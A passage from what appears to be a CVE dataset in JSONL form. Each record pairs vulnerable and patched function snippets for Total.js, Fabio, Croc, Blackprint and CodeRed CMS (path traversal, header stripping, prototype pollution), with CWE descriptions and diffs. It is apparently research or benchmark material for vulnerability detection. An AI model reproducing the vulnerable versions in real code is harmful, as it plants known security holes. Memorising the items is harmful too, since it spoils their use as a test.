res);\n\n\tvar isCORS = (F._length_cors || F.routes.corsall) && req.headers.origin != null;\n\n\tswitch (first) {\n\t\tcase 'G':\n\t\t\tF.stats.request.get++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback0);\n\t\t\telse\n\t\t\t\treq.$total_end();\n\t\t\treturn;\n\n\t\tcase 'O':\n\t\t\tF.stats.request.options++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback0);\n\t\t\telse\n\t\t\t\treq.$total_end();\n\t\t\treturn;\n\n\t\tcase 'H':\n\t\t\tF.stats.request.head++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback0);\n\t\t\telse\n\t\t\t\treq.$total_end();\n\t\t\treturn;\n\n\t\tcase 'D':\n\t\t\tF.stats.request['delete']++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback1);\n\t\t\telse\n\t\t\t\treq.$total_urlencoded();\n\t\t\treturn;\n\n\t\tcase 'P':\n\t\t\tif (F._request_check_POST) {\n\t\t\t\tif (multipart) {\n\t\t\t\t\tif (isCORS)\n\t\t\t\t\t\tF.$cors(req, res, cors_callback_multipart, multipart);\n\t\t\t\t\telse\n\t\t\t\t\t\treq.$total_multipart(multipart);\n\t\t\t\t} else {\n\t\t\t\t\tif (method === 'PUT')\n\t\t\t\t\t\tF.stats.request.put++;\n\t\t\t\t\telse if (method === 'PATCH')\n\t\t\t\t\t\tF.stats.request.path++;\n\t\t\t\t\telse\n\t\t\t\t\t\tF.stats.request.post++;\n\t\t\t\t\tif (isCORS)\n\t\t\t\t\t\tF.$cors(req, res, cors_callback1);\n\t\t\t\t\telse\n\t\t\t\t\t\treq.$total_urlencoded();\n\t\t\t\t}\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tbreak;\n\t}\n\n\treq.$total_status(404);\n};"}], "fix_func": [{"id": "fix_js_170_1", "commit": "de16238", "file_path": "index.js", "start_line": 7380, "end_line": 7568, "snippet": "F.$requestcontinue = function(req, res, headers) {\n\n\tif (!req || !res || res.headersSent || res.success)\n\t\treturn;\n\n\t// Validates if this request is the file (static file)\n\tif (req.isStaticFile) {\n\n\t\t// Stops path travelsation outside of \"public\" directory\n\t\t// A potential security issue\n\t\tfor (var i = 0; i < req.uri.pathname.length; i++) {\n\t\t\tvar c = req.uri.pathname[i];\n\t\t\tvar n = req.uri.pathname[i + 1];\n\t\t\tif ((c === '.' && n === '/') || (c === '%' && n === '2' && req.uri.pathname[i + 2] === 'e')) {\n\t\t\t\treq.$total_status(404);\n\t\t\t\treturn;\n\t\t\t}\n\t\t}\n\n\t\tF.stats.request.file++;\n\t\tif (F._length_files)\n\t\t\treq.$total_file();\n\t\telse\n\t\t\tres.continue();\n\t\treturn;\n\t}\n\n\tif (!PERF[req.method]) {\n\t\treq.$total_status(404);\n\t\treturn;\n\t}\n\n\tF.stats.request.web++;\n\n\treq.body = EMPTYOBJECT;\n\treq.files = EMPTYARRAY;\n\treq.buffer_exceeded = false;\n\treq.buffer_has = false;\n\treq.$flags = req.method[0] + req.method[1];\n\n\tvar flags = [req.method.toLowerCase()];\n\tvar multipart;\n\n\tif (F._request_check_mobile && req.mobile) {\n\t\treq.$flags += 'a';\n\t\tF.stats.request.mobile++;\n\t} else\n\t\tF.stats.request.desktop++;\n\n\treq.$protocol[5] && (req.$flags += req.$protocol[5]);\n\treq.$type = 0;\n\tflags.push(req.$protocol);\n\n\tvar method = req.method;\n\tvar first = method[0];\n\n\tif (first === 'P' || first === 'D') {\n\t\tmultipart = req.headers['content-type'] || '';\n\t\treq.buffer_data = U.createBuffer();\n\t\tvar index = multipart.lastIndexOf(';');\n\t\tvar tmp = multipart;\n\t\tif (index !== -1)\n\t\t\ttmp = tmp.substring(0, index);\n\t\tswitch (tmp.substring(tmp.length - 4)) {\n\t\t\tcase 'json':\n\t\t\t\treq.$flags += 'b';\n\t\t\t\tflags.push('json');\n\t\t\t\treq.$type = 1;\n\t\t\t\tmultipart = '';\n\t\t\t\tbreak;\n\t\t\tcase 'oded':\n\t\t\t\treq.$type = 3;\n\t\t\t\tmultipart = '';\n\t\t\t\tbreak;\n\t\t\tcase 'data':\n\t\t\t\treq.$flags += 'c';\n\t\t\t\treq.$upload = true;\n\t\t\t\tflags.push('upload');\n\t\t\t\tbreak;\n\t\t\tcase '/xml':\n\t\t\t\treq.$flags += 'd';\n\t\t\t\tflags.push('xml');\n\t\t\t\treq.$type = 2;\n\t\t\t\tmultipart = '';\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\tif (multipart) {\n\t\t\t\t\t// 'undefined' DATA\n\t\t\t\t\tmultipart = '';\n\t\t\t\t\tflags.push('raw');\n\t\t\t\t} else {\n\t\t\t\t\treq.$type = 3;\n\t\t\t\t\tmultipart = '';\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (headers.accept === 'text/event-stream') {\n\t\treq.$flags += 'g';\n\t\tflags.push('sse');\n\t}\n\n\tif (DEBUG) {\n\t\treq.$flags += 'h';\n\t\tflags.push('debug');\n\t}\n\n\tif (req.xhr) {\n\t\tF.stats.request.xhr++;\n\t\treq.$flags += 'i';\n\t\tflags.push('xhr');\n\t}\n\n\tif (F._request_check_robot && req.robot)\n\t\treq.$flags += 'j';\n\n\tif (F._request_check_referer) {\n\t\tvar referer = headers['referer'];\n\t\tif (referer && referer.indexOf(headers['host']) !== -1) {\n\t\t\treq.$flags += 'k';\n\t\t\tflags.push('referer');\n\t\t}\n\t}\n\n\treq.flags = flags;\n\tF.$events['request-begin'] && EMIT('request-begin', req, res);\n\n\tvar isCORS = (F._length_cors || F.routes.corsall) && req.headers.origin != null;\n\n\tswitch (first) {\n\t\tcase 'G':\n\t\t\tF.stats.request.get++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback0);\n\t\t\telse\n\t\t\t\treq.$total_end();\n\t\t\treturn;\n\n\t\tcase 'O':\n\t\t\tF.stats.request.options++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback0);\n\t\t\telse\n\t\t\t\treq.$total_end();\n\t\t\treturn;\n\n\t\tcase 'H':\n\t\t\tF.stats.request.head++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback0);\n\t\t\telse\n\t\t\t\treq.$total_end();\n\t\t\treturn;\n\n\t\tcase 'D':\n\t\t\tF.stats.request['delete']++;\n\t\t\tif (isCORS)\n\t\t\t\tF.$cors(req, res, cors_callback1);\n\t\t\telse\n\t\t\t\treq.$total_urlencoded();\n\t\t\treturn;\n\n\t\tcase 'P':\n\t\t\tif (F._request_check_POST) {\n\t\t\t\tif (multipart) {\n\t\t\t\t\tif (isCORS)\n\t\t\t\t\t\tF.$cors(req, res, cors_callback_multipart, multipart);\n\t\t\t\t\telse\n\t\t\t\t\t\treq.$total_multipart(multipart);\n\t\t\t\t} else {\n\t\t\t\t\tif (method === 'PUT')\n\t\t\t\t\t\tF.stats.request.put++;\n\t\t\t\t\telse if (method === 'PATCH')\n\t\t\t\t\t\tF.stats.request.path++;\n\t\t\t\t\telse\n\t\t\t\t\t\tF.stats.request.post++;\n\t\t\t\t\tif (isCORS)\n\t\t\t\t\t\tF.$cors(req, res, cors_callback1);\n\t\t\t\t\telse\n\t\t\t\t\t\treq.$total_urlencoded();\n\t\t\t\t}\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tbreak;\n\t}\n\n\treq.$total_status(404);\n};"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -8,9 +8,13 @@\n \n \t\t// Stops path travelsation outside of \"public\" directory\n \t\t// A potential security issue\n-\t\tif (req.uri.pathname.indexOf('./') !== -1) {\n-\t\t\treq.$total_status(404);\n-\t\t\treturn;\n+\t\tfor (var i = 0; i < req.uri.pathname.length; i++) {\n+\t\t\tvar c = req.uri.pathname[i];\n+\t\t\tvar n = req.uri.pathname[i + 1];\n+\t\t\tif ((c === '.' && n === '/') || (c === '%' && n === '2' && req.uri.pathname[i + 2] === 'e')) {\n+\t\t\t\treq.$total_status(404);\n+\t\t\t\treturn;\n+\t\t\t}\n \t\t}\n \n \t\tF.stats.request.file++;\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-48865", "cve_description": "Fabio is an HTTP(S) and TCP router for deploying applications managed by consul. Prior to version 1.6.6, Fabio allows clients to remove X-Forwarded headers (except X-Forwarded-For) due to a vulnerability in how it processes hop-by-hop headers. Fabio adds HTTP headers like X-Forwarded-Host and X-Forwarded-Port when routing requests to backend applications. Since the receiving application should trust these headers, allowing HTTP clients to remove or modify them creates potential security vulnerabilities. Some of these custom headers can be removed and, in certain cases, manipulated. The attack relies on the behavior that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been patched in version 1.6.6.", "cwe_info": {"CWE-345": {"name": "Insufficient Verification of Data Authenticity", "description": "The product does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data."}}, "repo": "https://github.com/fabiolb/fabio", "patch_url": ["https://github.com/fabiolb/fabio/commit/fdaf1e966162e9dd3b347ffdd0647b39dc71a1a3"], "programing_language": "Go", "vul_func": [{"id": "vul_go_296_1", "commit": "66acfbb02a64485b1471005df175c8408c5025cb", "file_path": "proxy/http_headers.go", "start_line": 36, "end_line": 135, "snippet": "func addHeaders(r *http.Request, cfg config.Proxy, stripPath string) error {\n\tremoteIP, _, err := net.SplitHostPort(r.RemoteAddr)\n\tif err != nil {\n\t\treturn errors.New(\"cannot parse \" + r.RemoteAddr)\n\t}\n\n\t// set configurable ClientIPHeader\n\t// X-Real-Ip is set later and X-Forwarded-For is set\n\t// by the Go HTTP reverse proxy.\n\tif cfg.ClientIPHeader != \"\" &&\n\t\tcfg.ClientIPHeader != \"X-Forwarded-For\" &&\n\t\tcfg.ClientIPHeader != \"X-Real-Ip\" {\n\t\tr.Header.Set(cfg.ClientIPHeader, remoteIP)\n\t}\n\n\tif r.Header.Get(\"X-Real-Ip\") == \"\" {\n\t\tr.Header.Set(\"X-Real-Ip\", remoteIP)\n\t}\n\n\t// set the X-Forwarded-For header for websocket\n\t// connections since they aren't handled by the\n\t// http proxy which sets it.\n\tws := r.Header.Get(\"Upgrade\") == \"websocket\"\n\tif ws {\n\t\tclientIP := remoteIP\n\t\t// If we aren't the first proxy retain prior\n\t\t// X-Forwarded-For information as a comma+space\n\t\t// separated list and fold multiple headers into one.\n\t\tprior, ok := r.Header[\"X-Forwarded-For\"]\n\t\tomit := ok && prior == nil // Issue 38079: nil now means don't populate the header\n\t\tif len(prior) > 0 {\n\t\t\tclientIP = strings.Join(prior, \", \") + \", \" + clientIP\n\t\t}\n\t\tif !omit {\n\t\t\tr.Header.Set(\"X-Forwarded-For\", clientIP)\n\t\t}\n\t}\n\n\t// Issue #133: Setting the X-Forwarded-Proto header to\n\t// anything other than 'http' or 'https' breaks java\n\t// websocket clients which use java.net.URL for composing\n\t// the forwarded URL. Since X-Forwarded-Proto is not\n\t// specified the common practice is to set it to either\n\t// 'http' for 'ws' and 'https' for 'wss' connections.\n\tproto := scheme(r)\n\tif r.Header.Get(\"X-Forwarded-Proto\") == \"\" {\n\t\tswitch proto {\n\t\tcase \"ws\":\n\t\t\tr.Header.Set(\"X-Forwarded-Proto\", \"http\")\n\t\tcase \"wss\":\n\t\t\tr.Header.Set(\"X-Forwarded-Proto\", \"https\")\n\t\tdefault:\n\t\t\tr.Header.Set(\"X-Forwarded-Proto\", proto)\n\t\t}\n\t}\n\n\tif r.Header.Get(\"X-Forwarded-Port\") == \"\" {\n\t\tr.Header.Set(\"X-Forwarded-Port\", localPort(r))\n\t}\n\n\tif r.Header.Get(\"X-Forwarded-Host\") == \"\" && r.Host != \"\" {\n\t\tr.Header.Set(\"X-Forwarded-Host\", r.Host)\n\t}\n\n\tif stripPath != \"\" {\n\t\tr.Header.Set(\"X-Forwarded-Prefix\", stripPath)\n\t}\n\n\tfwd := r.Header.Get(\"Forwarded\")\n\tif fwd == \"\" {\n\t\tfwd = \"for=\" + remoteIP + \"; proto=\" + proto\n\t}\n\tif cfg.LocalIP != \"\" {\n\t\tfwd += \"; by=\" + cfg.LocalIP\n\t}\n\tif r.Proto != \"\" {\n\t\tfwd += \"; httpproto=\" + strings.ToLower(r.Proto)\n\t}\n\tif r.TLS != nil && r.TLS.Version > 0 {\n\t\tv := tlsver[r.TLS.Version]\n\t\tif v == \"\" {\n\t\t\tv = uint16base16(r.TLS.Version)\n\t\t}\n\t\tfwd += \"; tlsver=\" + v\n\t}\n\tif r.TLS != nil && r.TLS.CipherSuite != 0 {\n\t\tfwd += \"; tlscipher=\" + uint16base16(r.TLS.CipherSuite)\n\t}\n\tr.Header.Set(\"Forwarded\", fwd)\n\n\tif cfg.TLSHeader != \"\" {\n\t\tif r.TLS != nil {\n\t\t\tr.Header.Set(cfg.TLSHeader, cfg.TLSHeaderValue)\n\t\t} else {\n\t\t\tr.Header.Del(cfg.TLSHeader)\n\t\t}\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_296_1", "commit": "fdaf1e966162e9dd3b347ffdd0647b39dc71a1a3", "file_path": "proxy/http_headers.go", "start_line": 47, "end_line": 162, "snippet": "func addHeaders(r *http.Request, cfg config.Proxy, stripPath string) error {\n\tremoteIP, _, err := net.SplitHostPort(r.RemoteAddr)\n\tif err != nil {\n\t\treturn errors.New(\"cannot parse \" + r.RemoteAddr)\n\t}\n\n\t// exclude headers from Connection rules.\n\tvar conHeaders []string\n\tfor _, s := range r.Header.Values(\"Connection\") {\n\t\tfor _, p := range strings.Split(s, \",\") {\n\t\t\tp = strings.TrimSpace(p)\n\t\t\tif !protectHeaders[textproto.CanonicalMIMEHeaderKey(p)] {\n\t\t\t\tconHeaders = append(conHeaders, p)\n\t\t\t}\n\t\t}\n\t}\n\n\tr.Header.Del(\"Connection\")\n\tif len(conHeaders) > 0 {\n\t\tr.Header.Set(\"Connection\", strings.Join(conHeaders, \", \"))\n\t}\n\n\t// set configurable ClientIPHeader\n\t// X-Real-Ip is set later and X-Forwarded-For is set\n\t// by the Go HTTP reverse proxy.\n\tif cfg.ClientIPHeader != \"\" &&\n\t\tcfg.ClientIPHeader != \"X-Forwarded-For\" &&\n\t\tcfg.ClientIPHeader != \"X-Real-Ip\" {\n\t\tr.Header.Set(cfg.ClientIPHeader, remoteIP)\n\t}\n\n\tif r.Header.Get(\"X-Real-Ip\") == \"\" {\n\t\tr.Header.Set(\"X-Real-Ip\", remoteIP)\n\t}\n\n\t// set the X-Forwarded-For header for websocket\n\t// connections since they aren't handled by the\n\t// http proxy which sets it.\n\tws := r.Header.Get(\"Upgrade\") == \"websocket\"\n\tif ws {\n\t\tclientIP := remoteIP\n\t\t// If we aren't the first proxy retain prior\n\t\t// X-Forwarded-For information as a comma+space\n\t\t// separated list and fold multiple headers into one.\n\t\tprior, ok := r.Header[\"X-Forwarded-For\"]\n\t\tomit := ok && prior == nil // Issue 38079: nil now means don't populate the header\n\t\tif len(prior) > 0 {\n\t\t\tclientIP = strings.Join(prior, \", \") + \", \" + clientIP\n\t\t}\n\t\tif !omit {\n\t\t\tr.Header.Set(\"X-Forwarded-For\", clientIP)\n\t\t}\n\t}\n\n\t// Issue #133: Setting the X-Forwarded-Proto header to\n\t// anything other than 'http' or 'https' breaks java\n\t// websocket clients which use java.net.URL for composing\n\t// the forwarded URL. Since X-Forwarded-Proto is not\n\t// specified the common practice is to set it to either\n\t// 'http' for 'ws' and 'https' for 'wss' connections.\n\tproto := scheme(r)\n\tif r.Header.Get(\"X-Forwarded-Proto\") == \"\" {\n\t\tswitch proto {\n\t\tcase \"ws\":\n\t\t\tr.Header.Set(\"X-Forwarded-Proto\", \"http\")\n\t\tcase \"wss\":\n\t\t\tr.Header.Set(\"X-Forwarded-Proto\", \"https\")\n\t\tdefault:\n\t\t\tr.Header.Set(\"X-Forwarded-Proto\", proto)\n\t\t}\n\t}\n\n\tif r.Header.Get(\"X-Forwarded-Port\") == \"\" {\n\t\tr.Header.Set(\"X-Forwarded-Port\", localPort(r))\n\t}\n\n\tif r.Header.Get(\"X-Forwarded-Host\") == \"\" && r.Host != \"\" {\n\t\tr.Header.Set(\"X-Forwarded-Host\", r.Host)\n\t}\n\n\tif stripPath != \"\" {\n\t\tr.Header.Set(\"X-Forwarded-Prefix\", stripPath)\n\t}\n\n\tfwd := r.Header.Get(\"Forwarded\")\n\tif fwd == \"\" {\n\t\tfwd = \"for=\" + remoteIP + \"; proto=\" + proto\n\t}\n\tif cfg.LocalIP != \"\" {\n\t\tfwd += \"; by=\" + cfg.LocalIP\n\t}\n\tif r.Proto != \"\" {\n\t\tfwd += \"; httpproto=\" + strings.ToLower(r.Proto)\n\t}\n\tif r.TLS != nil && r.TLS.Version > 0 {\n\t\tv := tlsver[r.TLS.Version]\n\t\tif v == \"\" {\n\t\t\tv = uint16base16(r.TLS.Version)\n\t\t}\n\t\tfwd += \"; tlsver=\" + v\n\t}\n\tif r.TLS != nil && r.TLS.CipherSuite != 0 {\n\t\tfwd += \"; tlscipher=\" + uint16base16(r.TLS.CipherSuite)\n\t}\n\tr.Header.Set(\"Forwarded\", fwd)\n\n\tif cfg.TLSHeader != \"\" {\n\t\tif r.TLS != nil {\n\t\t\tr.Header.Set(cfg.TLSHeader, cfg.TLSHeaderValue)\n\t\t} else {\n\t\t\tr.Header.Del(cfg.TLSHeader)\n\t\t}\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/proxy/http_headers.go\n+++ b/proxy/http_headers.go\n@@ -2,6 +2,22 @@\n \tremoteIP, _, err := net.SplitHostPort(r.RemoteAddr)\n \tif err != nil {\n \t\treturn errors.New(\"cannot parse \" + r.RemoteAddr)\n+\t}\n+\n+\t// exclude headers from Connection rules.\n+\tvar conHeaders []string\n+\tfor _, s := range r.Header.Values(\"Connection\") {\n+\t\tfor _, p := range strings.Split(s, \",\") {\n+\t\t\tp = strings.TrimSpace(p)\n+\t\t\tif !protectHeaders[textproto.CanonicalMIMEHeaderKey(p)] {\n+\t\t\t\tconHeaders = append(conHeaders, p)\n+\t\t\t}\n+\t\t}\n+\t}\n+\n+\tr.Header.Del(\"Connection\")\n+\tif len(conHeaders) > 0 {\n+\t\tr.Header.Set(\"Connection\", strings.Join(conHeaders, \", \"))\n \t}\n \n \t// set configurable ClientIPHeader\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-43616", "cve_description": "An issue was discovered in Croc through 9.6.5. A sender can cause a receiver to overwrite files during ZIP extraction.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/schollz/croc", "patch_url": ["https://github.com/schollz/croc/commit/4929635eb875d2304e9415b8f4aa62af9e1a2339"], "programing_language": "Go", "vul_func": [{"id": "vul_go_157_1", "commit": "3f12f75", "file_path": "src/utils/utils.go", "start_line": 430, "end_line": 475, "snippet": "func UnzipDirectory(destination string, source string) error {\n\tarchive, err := zip.OpenReader(source)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tdefer archive.Close()\n\n\tfor _, f := range archive.File {\n\t\tfilePath := filepath.Join(destination, f.Name)\n\t\tfmt.Fprintf(os.Stderr, \"\\r\\033[2K\")\n\t\tfmt.Fprintf(os.Stderr, \"\\rUnzipping file %s\", filePath)\n\t\t// Issue #593 conceal path traversal vulnerability\n\t\t// make sure the filepath does not have \"..\"\n\t\tfilePath = filepath.Clean(filePath)\n\t\tif strings.Contains(filePath, \"..\") {\n\t\t\tlog.Fatalf(\"Invalid file path %s\\n\", filePath)\n\t\t}\n\t\tif f.FileInfo().IsDir() {\n\t\t\tos.MkdirAll(filePath, os.ModePerm)\n\t\t\tcontinue\n\t\t}\n\n\t\tif err := os.MkdirAll(filepath.Dir(filePath), os.ModePerm); err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tdstFile, err := os.OpenFile(filePath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n\t\tif err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tfileInArchive, err := f.Open()\n\t\tif err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tif _, err := io.Copy(dstFile, fileInArchive); err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tdstFile.Close()\n\t\tfileInArchive.Close()\n\t}\n\tfmt.Fprintf(os.Stderr, \"\\n\")\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_157_1", "commit": "4929635", "file_path": "src/utils/utils.go", "start_line": 430, "end_line": 485, "snippet": "func UnzipDirectory(destination string, source string) error {\n\tarchive, err := zip.OpenReader(source)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tdefer archive.Close()\n\n\tfor _, f := range archive.File {\n\t\tfilePath := filepath.Join(destination, f.Name)\n\t\tfmt.Fprintf(os.Stderr, \"\\r\\033[2K\")\n\t\tfmt.Fprintf(os.Stderr, \"\\rUnzipping file %s\", filePath)\n\t\t// Issue #593 conceal path traversal vulnerability\n\t\t// make sure the filepath does not have \"..\"\n\t\tfilePath = filepath.Clean(filePath)\n\t\tif strings.Contains(filePath, \"..\") {\n\t\t\tlog.Fatalf(\"Invalid file path %s\\n\", filePath)\n\t\t}\n\t\tif f.FileInfo().IsDir() {\n\t\t\tos.MkdirAll(filePath, os.ModePerm)\n\t\t\tcontinue\n\t\t}\n\n\t\tif err := os.MkdirAll(filepath.Dir(filePath), os.ModePerm); err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\t// check if file exists\n\t\tif _, err := os.Stat(filePath); err == nil {\n\t\t\tprompt := fmt.Sprintf(\"\\nOverwrite '%s'? (y/N) \", filePath)\n\t\t\tchoice := strings.ToLower(GetInput(prompt))\n\t\t\tif choice != \"y\" && choice != \"yes\" {\n\t\t\t\tfmt.Fprintf(os.Stderr, \"skipping '%s'\", filePath)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\n\t\tdstFile, err := os.OpenFile(filePath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n\t\tif err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tfileInArchive, err := f.Open()\n\t\tif err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tif _, err := io.Copy(dstFile, fileInArchive); err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tdstFile.Close()\n\t\tfileInArchive.Close()\n\t}\n\tfmt.Fprintf(os.Stderr, \"\\n\")\n\treturn nil\n}"}], "vul_patch": "--- a/src/utils/utils.go\n+++ b/src/utils/utils.go\n@@ -24,6 +24,16 @@\n \t\t\tlog.Fatalln(err)\n \t\t}\n \n+\t\t// check if file exists\n+\t\tif _, err := os.Stat(filePath); err == nil {\n+\t\t\tprompt := fmt.Sprintf(\"\\nOverwrite '%s'? (y/N) \", filePath)\n+\t\t\tchoice := strings.ToLower(GetInput(prompt))\n+\t\t\tif choice != \"y\" && choice != \"yes\" {\n+\t\t\t\tfmt.Fprintf(os.Stderr, \"skipping '%s'\", filePath)\n+\t\t\t\tcontinue\n+\t\t\t}\n+\t\t}\n+\n \t\tdstFile, err := os.OpenFile(filePath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())\n \t\tif err != nil {\n \t\t\tlog.Fatalln(err)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-24294", "cve_description": "A Prototype Pollution issue in Blackprint @blackprint/engine v.0.9.0 allows an attacker to execute arbitrary code via the _utils.setDeepProperty function of engine.min.js.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/Blackprint/engine-js", "patch_url": ["https://github.com/Blackprint/engine-js/commit/bd6b965b03c467e7a58ab0cb89b9172fa5e07013"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_120_1", "commit": "9e696b7", "file_path": "src/utils.js", "start_line": 4, "end_line": 34, "snippet": "function setDeepProperty(obj, path, value, onCreate){\n\tlet temp;\n\tlet isSF = window.sf?.Obj != null;\n\n\tfor(var i = 0, n = path.length-1; i < n; i++){\n\t\ttemp = path[i];\n\n\t\t// Disallow diving into internal JavaScript property\n\t\tif(temp === \"constructor\" || temp === \"__proto__\" || temp === \"prototype\")\n\t\t\treturn;\n\n\t\tif(obj[temp] === void 0){\n\t\t\tif(isSF) sf.Obj.set(obj, temp, {});\n\t\t\telse obj[temp] = {};\n\n\t\t\t// onCreate && onCreate(obj[temp], obj, temp);\n\t\t\tonCreate && onCreate(obj[temp]);\n\t\t}\n\n\t\tobj = obj[temp];\n\t}\n\n\ttemp = path[i];\n\tif(temp === \"constructor\" || temp === \"__proto__\" || temp === \"prototype\")\n\t\treturn;\n\n\tif(isSF) sf.Obj.set(obj, temp, value);\n\telse obj[temp] = value;\n\n\treturn;\n}"}], "fix_func": [{"id": "fix_js_120_1", "commit": "bd6b965", "file_path": "src/utils.js", "start_line": 4, "end_line": 40, "snippet": "function setDeepProperty(obj, path, value, onCreate){\n\tlet temp;\n\tlet isSF = window.sf?.Obj != null;\n\n\tfor(var i = 0, n = path.length-1; i < n; i++){\n\t\ttemp = path[i];\n\n\t\tif(temp.constructor !== String && temp.constructor !== Number)\n\t\t\tthrow new Error(\"Object field must be Number or String, but found: \" + JSON.stringify(temp));\n\n\t\t// Disallow diving into internal JavaScript property\n\t\tif(temp === \"constructor\" || temp === \"__proto__\" || temp === \"prototype\")\n\t\t\treturn;\n\n\t\tif(obj[temp] === void 0){\n\t\t\tif(isSF) sf.Obj.set(obj, temp, {});\n\t\t\telse obj[temp] = {};\n\n\t\t\t// onCreate && onCreate(obj[temp], obj, temp);\n\t\t\tonCreate && onCreate(obj[temp]);\n\t\t}\n\n\t\tobj = obj[temp];\n\t}\n\n\ttemp = path[i];\n\tif(temp.constructor !== String && temp.constructor !== Number)\n\t\tthrow new Error(\"Object field must be Number or String, but found: \" + JSON.stringify(temp));\n\n\tif(temp === \"constructor\" || temp === \"__proto__\" || temp === \"prototype\")\n\t\treturn;\n\n\tif(isSF) sf.Obj.set(obj, temp, value);\n\telse obj[temp] = value;\n\n\treturn;\n}"}], "vul_patch": "--- a/src/utils.js\n+++ b/src/utils.js\n@@ -4,6 +4,9 @@\n \n \tfor(var i = 0, n = path.length-1; i < n; i++){\n \t\ttemp = path[i];\n+\n+\t\tif(temp.constructor !== String && temp.constructor !== Number)\n+\t\t\tthrow new Error(\"Object field must be Number or String, but found: \" + JSON.stringify(temp));\n \n \t\t// Disallow diving into internal JavaScript property\n \t\tif(temp === \"constructor\" || temp === \"__proto__\" || temp === \"prototype\")\n@@ -21,6 +24,9 @@\n \t}\n \n \ttemp = path[i];\n+\tif(temp.constructor !== String && temp.constructor !== Number)\n+\t\tthrow new Error(\"Object field must be Number or String, but found: \" + JSON.stringify(temp));\n+\n \tif(temp === \"constructor\" || temp === \"__proto__\" || temp === \"prototype\")\n \t\treturn;\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-46897", "cve_description": "views.py in Wagtail CRX CodeRed Extensions (formerly CodeRed CMS or coderedcms) before 0.22.3 allows upward protected/..%2f..%2f path traversal when serving protected media.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/coderedcorp/coderedcms", "patch_url": ["https://github.com/coderedcorp/coderedcms/commit/06006cec23a723bc7d76df75ce2c2d795a447902"], "programing_language": "Python", "vul_func": [{"id": "vul_py_203_1", "commit": "acc37d2", "file_path": "coderedcms/views.py", "start_line": 110, "end_line": 123, "snippet": "def serve_protected_file(request, path):\n \"\"\"\n Function that serves protected files uploaded from forms.\n \"\"\"\n fullpath = os.path.join(cr_settings['PROTECTED_MEDIA_ROOT'], path)\n if os.path.isfile(fullpath):\n mimetype, encoding = mimetypes.guess_type(fullpath)\n with open(fullpath, 'rb') as f:\n response = HttpResponse(f.read(), content_type=mimetype)\n if encoding:\n response[\"Content-Encoding\"] = encoding\n\n return response\n raise Http404()"}], "fix_func": [{"id": "fix_py_203_1", "commit": "06006ce", "file_path": "coderedcms/views.py", "start_line": 110, "end_line": 127, "snippet": "def serve_protected_file(request, path):\n \"\"\"\n Function that serves protected files uploaded from forms.\n \"\"\"\n # Fully resolve all provided paths.\n mediapath = 